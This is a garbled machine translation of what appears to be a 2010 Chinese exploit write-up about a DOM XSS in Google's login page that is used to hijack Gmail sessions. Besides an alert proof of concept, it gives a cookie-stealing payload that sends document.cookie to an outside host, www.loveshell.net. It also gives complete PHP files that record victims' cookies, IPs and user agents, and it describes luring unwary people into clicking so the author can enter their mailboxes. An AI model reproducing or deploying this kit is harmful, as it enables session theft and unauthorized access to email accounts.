Simple html injection leads to Gmail 0day-vulnerability warning-the black bar safety net

2010-01-08T00:00:00
ID MYHACK58:62201025857
Type myhack58
Reporter 佚名
Modified 2010-01-08T00:00:00

Description

/Very good article Oh/ A Google. com service certification analysis

xssand authentication are inseparable, the authentication way may decide toxssthe use of the way, the last analysis feel too sloppy, even proven wrong, this time to a detailed analysis under the gmail landing way, for the future of the prepared: a) A normal landing, go to home, then input http://mail. google. com/mail/, began to grab the request, process the request as a cookie simply treated: a

1 http://mail.google.com/mail/

2 https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail. google. com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default < mplcache=2

3 http://mail.google.com/mail/?ui=html&zy=l&pli=1&auth=DQAAAHoAAABQSQc9YLJ0OVWvxie35DyUk2imfy2kmgvggtzspa0lf6wdxn9te2b8eterw3pjh0ugxf5ndmunowqhfqa9w42iat7vj5q_MS4wnrVlEl8qNA__13oQbLk6slnwRH7xE_g0dAHv6GTTLdnpH2Sz_944H50_kkiySYkJxbEwizrJfg&gausr=xssshell%40gmail.com

4 http://mail.google.com/mail/?auth=DQAAAHoAAABQSQc9YLJ0OVWvxie35DyUk2iMFY2kMgVggTzsPa0lF6wDXN9Te2B8Eterw3Pjh0ugXF5NdmuNowQHFQa9w42IaT7vj5Q_MS4wnrVlEl8qNA__13oQbLk6slnwRH7xE_g0dAHv6GTTLdnpH2Sz_944H50_kkiySYkJxbEwizrJfg&gausr=xssshell%40gmail. com&zx=15tl76j8t6fkm

The above steps complete the gmail login is what determines whether you landed? These requests inside the only possible change is to send the cookie, and we know that google uses cookie authentication, and may you once landing N days after, or may be directly into the service. Analysis of the above request:

1 login request mail Cookie: __utmx=1 7 3 2 7 2 3 7 3.; __utmz=173272373.1193966736.8.2. utmccn=(referral)|utmcsr=google. cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=1 7 3 2 7 2 3 7 3; __utmc=1 7 3 2 7 2 3 7 3; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1 1 6 5 1 9 7 3 7 3:LM=1 1 9 1 8 3 0 4 4 8:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=3 6 0; SID=DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2Bil4iteymiqgcfpmia6ywxkstmokb4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ

2 steering https://request authentication Cookie: __utmz=173272373.1193966736.8.2. utmccn=(referral)|utmcsr=google. cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; GoogleAccountsLocale_session=en; GALX=-9v3itptNkM; __utmx=1 7 3 2 7 2 3 7 3.; __utmb=1 7 3 2 7 2 3 7 3; __utmc=1 7 3 2 7 2 3 7 3; __utma=173272373.186433766.1188982067.1190878925.1191830423.5; __utmz=173272373.1191134563.4.2. utmccn=(referral)|utmcsr=google.com/utmcct=//utmcmd=referral; LSID=ig. US|s. CN:DQAAAHoAAAAhRFp2nnIbqg0aVlV6Uqz2dujgmuqjr5ktpx6ejootmgko8_x0k0netkvlm_uwifecgc6sl5suiw1zguxghgniwisvjohf_w4uqwvuf5dywei8g; GAUSR=xssshell@gmail.com; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1 1 6 5 1 9 7 3 7 3:LM=1 1 9 1 8 3 0 4 4 8:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=3 6 0; SID=DQAAAHYAAAB_DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAiAkby3kca96qsp4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ

3 the authentication is successful, return to the requested service Cookie: __utmx=1 7 3 2 7 2 3 7 3.; __utmz=173272373.1193966736.8.2. utmccn=(referral)|utmcsr=google. cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=1 7 3 2 7 2 3 7 3; __utmc=1 7 3 2 7 2 3 7 3; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1 1 6 5 1 9 7 3 7 3:LM=1 1 9 1 8 3 0 4 4 8:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=3 6 0; SID=DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2Bil4iteymiqgcfpmia6ywxkstmokb4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ Note that with 1 Not much difference, but this time it has setcookie content, to back a step to know

4 start the normal use of the service Cookie: __utmx=1 7 3 2 7 2 3 7 3.; __utmz=173272373.1193966736.8.2. utmccn=(referral)|utmcsr=google. cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=1 7 3 2 7 2 3 7 3; __utmc=1 7 3 2 7 2 3 7 3; gmailchat=aaaaaaaa@gmail.com/807215; S=gmail=cfWQ6LE0MZbiJm25LDZxlg:gmail_yj=Z7vHwAIXkryktlbItejqXg:gmproxy=OPFmILmMa5U:gmproxy_yj=u-33CWWWIPU:gmproxy_yj_sub=9l7cuWTN924; GX=DQAAAHgAVTV8SGetElPbTPX1c7FbBKTFkok35whihdnp72o29rmgf-OShTX8QWHmxvlSsf6rvujTywXjs-_NO_2YwL3mkkzlmUA1P-M4C-gp3Qv7N84c9TU4ONw; GMAIL_AT=2203afa7965c02d0-115fe01fa2f; GBE=bf-i; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1 1 6 5 1 9 7 3 7 3:LM=1 1 9 1 8 3 0 4 4 8:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; TZ=-480; GMAIL_RTT=3 6 0; SID=DQAAAHYAAAB_DQ-pH28Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2BanYhiezv16ywxkstmokby3kca96qsp4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ; GMAIL_HELP=hosted:0

This time we need to be very understanding of the Protocol and the cookie, the cookie include a domain and path, the above second step, we sent the last of the cookie is https://www. google. com/the following cookie, this cookie is for http://www. google. com is completely invisible, with the cookie authentication after the authentication server generates an auth and the url go to http://mail. google. com, and http://mail. google. com use this auth to generate the cookie, of course, google is setting the path is in/mail/below, the General path is not taken.

Here, we have reason to be very pessimistic, Yes, want to usexssinto gmail while only a few points can be cut to:

1 in https on the serverxss, to obtain the authentication cookie, this time you can use the stolen cookie into any service. 2 in the http://www. google. com/mail/or http://mail. google. com/mail/next toxss, direct access to mail Certification information, this does not affect the other services.

Two of our food?

These are our Gmail 0day theoretical Foundation, and now we just need a meet 1 or 2xsspoint. In an unintentionally view the source files found in thisxss, this injection vulnerability appears in the google landing page, the very aptly satisfies our Condition 1, If get to the cookie theory on can into any google service Oh, really lucky, huh. Open the mail login page can be obtained the following address:

https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail. google. com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default < mplcache=2

This addresses many parameters, and many will appear on the page, but google on security is still very important, come in the parameters or program for the filter, either directly tell you to illegal request, but the last time I mentioned html injection, but is not affected by the server side impact, because the problem occurs on the client, the server would not have noticed. Then html injection where? View the page source file can be seen below the function definition:

<script> function utmx_section(){} (function(){var k=’3 0 6 8 8 1 8 3 4 0’,d=document,l=d. location,c=d. cookie;function f(n){ if(c){var i=c. indexOf(n+’=’);if(i>-1){var j=c. indexOf(’;’,i);return c. substring(i+n. length+1,j<0? c. length:j)}}}var x=f(’__utmx’),xx=f(’__utmxx’),h=l. hash, t=h. length>1||! xx||! xx. indexOf(k+’:bypasscache’);d. write(’<sc’+’ript src="’+ ’http’+(l. protocol==’https:’?’s://ssl’:’://www’)+’. google-analytics.com’ +’/siteopt. js? utmxkey=’+k+’&utmx=’+(x? x:’)+’&utmxx=’+(xx? xx:’)+(t?’& amp;utmxtime=’ +new Date(). valueOf():’)+(h?’& amp;utmxhash=’+h. substr(1):’)+ ’" type="text/javascript" charset="utf-8"></sc’+’ript>’)})(); </script> <script>utmx_section("title")</script>

This code looks like Is to google for the statistics of the code, he made what use we will not discuss, we take a look at this piece of code, first defines a function, and then calls this function, and this function precisely with one of:

l=d. location

Only this one sentence on behalf of a user input, and then look at this l:

h=l. hash

hash is a url#after the part of the submission is on the server is not visible. Then? Then it was d. write operation, the d is to begin the definition of the document object, here re-wrote the page, and parameters inside a hash of the content, not filtered through the ground Oh, it is a typical html injection vulnerability. The next is on the use. Here use is also very simple, the url in the#back of the content represented here is the hash, to ensure good grammar correct canxss. I here provide a simple poc of:

https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail. google. com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default < mplcache=2&passive=truel#"></script><script>alert(’xss’)</script>&1-=1

You can see the pop-up byxss, you can prove that we can run the code.

Three Trojan

Above you can execute code, but here the use is still a little problem, the conventional url - xssare embedded into the iframe implementation, but this is a https page when testing found that in ie to embed the iframe is taken within the cookie information of the looks like later know http also does not work, and firefox's normal, so want to be able to not directly on the mail for some operation? But the test of the time to find even if is the same domain name below to https is not an operation of the http page and the https inside with the http content when the prompt appears, which is the use to bring up the difficulty level, but since we got the cookie got all the words, so as long as you can get cookies as you can, not by the domain name affect the window. location jump! The Trojan as follows:

<script> foourl=’; window. location=’https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail. google. com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default < mplcache=2&passive=truel#"></sc’+’ript><scr’+’ipt>eval(unescape("url%3Ddocument. location. href%3Bcookie%3D.% 3Bc%3D%27http%3A//www. loveshell. net/1. php%3Fc%3D%2 7+cookies+%2 7%26u%3D%2 7+url%3Bdocument. location. hash%3D%2 7% 2 7%3Bdocument. location%3Dc%3B"))</scr’+’ipt>’; </script>

The intermediate code executing the content, 将当前cookie作为参数跳转到www.loveshell.net and then we at that 1. php where to save the need of the cookie and other information, and then again for a second time to jump to the other site, to do covert work after we can use to get the cookie into someone else's mailbox. The entire use process should look like this: We have carefully constructed an address, 譬如http://www.loveshell.net/contact.html, which contains our exp, and then we will this address defrauding others of click, this may you need to concoct a tempting story and looking for a security is not too sensitive people, in others open this address after we will be this forged address and is suspicious of something destroyed, then you can use to get the cookie into his mailbox. Thisxssor the more difficult the defense of the entire process on the client, only from nature to improve code security in order to avoid such a problem, google's security authentication mode should also be questioned. Until now google has not patched the vulnerability Oh, and Just for fun :)

Several Trojan files as follows:

<? php

//Configuration file, do not rename

//Lie to someone to access the contact. php can be

//contact. php can be renamed, the image. php and config. php can't

$sitepath=’http://127.0.0.1/test/gmail/’;//你 的 image.php,config.php,contact. php into a directory, this directory's location, remember to add/

$gourl=’http://www.163.com/’;//steal the cookies after the jump position

?& gt;

<?

//Exploit files

include ’config.php’;

?& gt;

<script>

foourl=’;

window. status=’;

window. location=’https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail. google. com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default < mplcache=2&passive=truel#"></sc’+’ript><scr’+’ipt>eval(unescape("url%3Ddocument. location. href%3Bcookie%3Ddocument. cookie%3Bc%3D%2 7<? php echo $sitepath?& gt;image. php%3Fc%3D%2 7+cookies+%2 7%26u%3D%2 7+url%3Bdocument. location. hash%3D%2 7% 2 7%3Bdocument. location%3Dc%3B"))</scr’+’ipt>’;

</script>

<?

//Fetch the cookie file

include ’config.php’;

?& gt;

<? php

if($_GET[c])

{

$file=fopen("fuckgoogle.php","a+");

fputs($file,"<? php die();?& gt;"."||| Cookie:$_GET[c]|||user-agent:$_SERVER[HTTP_USER_AGENT]|||REMOTE_ADDR:$_SERVER[REMOTE_ADDR]|||REFERER:$_SERVER[HTTP_REFERER]|||the url:$_GET[u]\r\n");

fclose($file);

}

else {

$file=fopen("fuckgoogle.txt","a+");

fputs($file,"<? php die();?& gt;"."||| Cookie:$_GET[c]|||user-agent:$_SERVER[HTTP_USER_AGENT]|||REMOTE_ADDR:$_SERVER[REMOTE_ADDR]|||REFERER:$_SERVER[HTTP_REFERER]|||the url:$_GET[u]\r\n");

fclose($file);

}

@unlink(’contact.php’);

?& gt;

<script>

document. location=’<? php echo $gourl?& gt;’;

</script>